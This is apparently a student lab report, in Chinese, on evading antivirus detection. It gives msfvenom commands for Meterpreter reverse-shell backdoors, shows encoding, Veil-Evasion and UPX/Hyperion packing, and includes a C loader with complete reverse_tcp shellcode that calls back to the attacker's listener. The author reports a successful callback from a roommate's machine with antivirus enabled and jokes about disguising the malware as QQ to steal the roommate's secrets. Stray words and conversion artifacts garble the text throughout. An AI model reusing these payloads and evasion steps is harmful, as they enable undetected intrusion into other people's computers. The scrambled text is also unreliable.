Exp3 免殺原理與實踐 20164314

1、實踐內容html

  1.正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,加殼工具,使用shellcode編程java

  2.經過組合應用各類技術實現惡意代碼免殺(0.5分)shell

(若是成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。)編程

  3.用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本(加分0.5)windows

2、基礎問題回答

(1)殺軟是如何檢測出惡意代碼的?

答:tcp

  ①基於特徵碼檢測;若是一個可執行文件包含一段特徵碼則被認爲是惡意代碼,過期的特徵碼庫就是沒有用的,所以殺毒軟件的更新很重要。函數

  ②啓發式惡意軟件檢測;若是一個軟件乾的事一般是惡意軟件纔會乾的,就可從中獲得啓發,把它看作是惡意軟件。工具

  ③基於行爲的惡意軟件檢測;至關因而啓發式的一種,或者是加入了行爲監控的啓發式。post

(2)免殺是作什麼?網站

答:免殺就是經過處理惡意軟件好讓其不被殺毒軟件檢測出來。

(3)免殺的基本方法有哪些?

答:

  ①改變特徵碼;若只有exe能夠經過加殼,包括壓縮殼和加密殼來改變特徵碼。如有源代碼,可用其餘語言進行從新再編譯(veil-evasion)。

  ②改變行爲;通信方式儘可能使用反彈式鏈接、隧道技術或者加密通信數據。操做模式最好基於內存操做,減小對系統的修改,加入混淆做用的正常功能代碼。

3、實驗過程

(一)正確使用msf編碼器,veil-evasion,本身利用shellcode編程等免殺工具或技巧

Windows的IP:192.168.219.131

Linux的IP:192.168.219.128

 

 

1.msfvenom直接生成meterpreter可執行文件

1)查看用msfvenom指令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.219.128 LPORE=4314 -f exe > 20164314_backdoor.exe生成的後門可執行文件的免殺效果;

 

(2)打開網址在http://www.virscan.org/網站上查一下這個病毒能被多少殺軟檢測出來(要把後門的名字改爲符合網站要求的名字),發現有61%的殺軟(30/49)報告發現病毒,說明這種方式造成的後門免殺效果不好

 

2.Msfvenom使用編碼器生成meterpreter可執行文件

(1)msfvenom使用編碼器,輸入指令: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.219.128 LPORT=4314 -f exe > 201643140_backdoor.exe

 

(2) 查看生成的後門文件的免殺效果,發現有55%的殺軟(27/49)報告發現病毒,我覺得說編碼會下降檢出率,結果卻差很少,沒有什麼太大的變化

 

3.屢次編碼

(1)嘗試多編碼幾回,輸入指令: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b  ‘\x00’ LHOST=192.168.199.132 LPORT=4319 -f exe > 15431900_backdoor.exe

(2)查看生成的後門文件的免殺效果

 

(3)發現有59%的殺軟(29/49)報告發現病毒,看來多編碼幾回也並無什麼用

4.msfvenom生成jar文件

(1)msfvenom使用編碼器,輸入指令

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.218.128 LPORT=4314 x> 201643143_backdoor_java.jar

(2)查看生成的後門文件的免殺效果

(二)使用Veil-Evasion生成可執行文件

1.Veil-Evasion是一個免殺平臺,與Metasploit有點相似,默認沒裝;

2.安裝veil-evasion

參考網址:http://www.freebuf.com/sectool/89024.html

安裝了兩次,沒有成功,多是由於網速的問題吧········

最後找同窗拷了一個·······,才「安裝成功」。

3.輸入指令:veil-evasion

veil-evasion

打開軟件,自動列出可用的指令 

4.輸入命令

use c/meterpreter/rev_tcp.py

進入配置界面

 

5.設置反彈鏈接IP,命令爲:

set LHOST 192.168.219.128

設置端口,命令爲:

set LPORT 4314

查看:

6.輸入指令generate,接着輸入你想要playload的名字:ICes

7.在/var/lib/veil-evasion/output/compiled/下找到 ICes.exe 文件,傳到Windows檢測

免殺結果:

 

(三)C語言調動shellcode

 (1)首先使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.219.128 LPORT=4314 -f c用c語言生成一段shellcode;

 (2)將這些特徵碼複製到windows上,加上主函數後編譯運行生成的可執行文件

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xdb\x80"
"\x68\x02\x00\x10\xda\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

(3)運行.exe,提示木馬文件

(4)用360查殺

 

(5)在網址http://www.virscan.org/查看

 

(6)運行回連kali

 

回連成功。

 (7)用upx加殼

 

回連

(8)加密殼Hyperion

  • 將上一個生成的文件拷貝到/usr/share/windows-binaries/hyperion/目錄中
  • 進入目錄/usr/share/windows-binaries/hyperion/
  • 輸入命令 wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe 進行加殼:

 

(四)用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本

 

回連室友電腦結果

 

4、離實戰還缺些什麼技術或步驟

     1.咱們要成功監聽的話必需要靶機啓動可執行文件,能夠經過下載軟件的時候能夠捆綁到軟件上,可是執行仍是有必定難度的。

     2.如今的殺毒軟件的各類特徵庫更新的很快,要想達到實戰還須要作到靈活更新。

5、實驗體會

      爲了完成此次實驗,經歷了千辛萬苦,花了大半天的時間,最後基本完成了實驗要求。經過此次實踐,實現了惡意軟件的免殺,並且這個過程也不是很複雜,不由讓我有了那麼一絲恐懼,個人電腦裏是否是也有很多這樣的惡意軟件,必定要抽個時間好好檢查檢查,還讓我有了一絲興奮,一旦把惡意軟件假裝成QQ,拷到我室友電腦裏,等他一運行,他的祕密將無處可藏,哈哈哈哈(手動滑稽)(別提醒他)。

相關文章
相關標籤/搜索